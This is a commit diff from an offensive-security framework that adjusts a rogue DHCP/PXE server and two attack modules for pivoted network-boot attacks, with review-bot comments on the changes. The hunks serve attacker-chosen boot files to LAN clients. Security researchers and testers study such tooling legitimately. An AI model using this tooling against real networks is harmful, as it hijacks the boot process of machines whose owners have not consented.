Fixes #5312 for pivoted PXE attacks.

git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Weeks 2011-08-25 02:07:35 +00:00
parent 53e43fa847
commit 06c3dabe31
5 changed files with 13 additions and 9 deletions

Binary file not shown.


@ -222,6 +222,9 @@ int DHCPserv::run(){
string pxeConfigFile("update2"); string pxeConfigFile("update2");
stringOptionCheck(&pxeConfigFile, "PXECONF"); stringOptionCheck(&pxeConfigFile, "PXECONF");
string pxeAltConfigFile("update0");
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
string pxePathPrefix(""); string pxePathPrefix("");
//get DHCP parameters //get DHCP parameters
unsigned int leaseTime = 600; unsigned int leaseTime = 600;
@ -336,10 +339,6 @@ int DHCPserv::run(){
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
pkt << DHCPOffer; pkt << DHCPOffer;
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
continue; //Already served; allowing normal boot
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK }else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
pkt << DHCPAck; pkt << DHCPAck;
@ -360,7 +359,12 @@ int DHCPserv::run(){
pkt << dhcpoption(OpDns, iton(dnsServer)); pkt << dhcpoption(OpDns, iton(dnsServer));
string pxemagic(PXEMagic,4); string pxemagic(PXEMagic,4);
pkt << dhcpoption(OpPXEMagic, pxemagic); pkt << dhcpoption(OpPXEMagic, pxemagic);
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
else
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix); pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime)); pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
if ( hostname.length() > 0 ){ if ( hostname.length() > 0 ){
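Review bot: The relocated check `if (serveOnce == true && served.count(clienthwaddr) > 0)` now runs for both Discover and Request replies, while the place where `served` is filled lies outside this hunk. If a client is recorded before its first ACK is built, that ACK would already carry `pxeAltConfigFile`; the ordering is worth confirming and stating in a comment such as `// served is updated only after the ACK is sent, so the first boot still gets pxeConfigFile`. The trailing comment `//Already served; allowing normal boot` is also stale, because the server no longer stays silent for such clients but answers with the PXEALTCONF file (default `update0`); `// already served: offer PXEALTCONF instead of PXECONF` would match the code. DHCPserv::run starts and ends outside the hunk.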


@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Loading DHCP options...") print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore) client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i| 0.upto(4) do |i|
print_status("Loading file #{i} of 4") print_status("Loading file #{i+1} of 5")
if i < 4 if i < 4
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
else else
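Review bot: Starting the loop at 0 makes `update0` a newly required file, but the `IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))` call is unguarded. A TFTPROOT laid out for the previous file set would therefore raise Errno::ENOENT only after `load_dhcp_options` has already run. Checking the paths before anything is loaded would fail cleanly, for example `path = ::File.join(datastore['TFTPROOT'], "update#{i}")` followed by `raise "Missing #{path}" unless ::File.file?(path)`. The same applies to the identical loop in the Msf::Post section that follows. The bound in `0.upto(4)` and the `5` in the status message are separate literals that must be kept in sync by hand, and the `else` branch continues outside the hunk.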


@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
print_status("Loading DHCP options...") print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore) client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i| 0.upto(4) do |i|
print_status("Loading file #{i} of 4") print_status("Loading file #{i+1} of 5")
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
client.lanattacks.add_tftp_file("update#{i}",contents) client.lanattacks.add_tftp_file("update#{i}",contents)
end end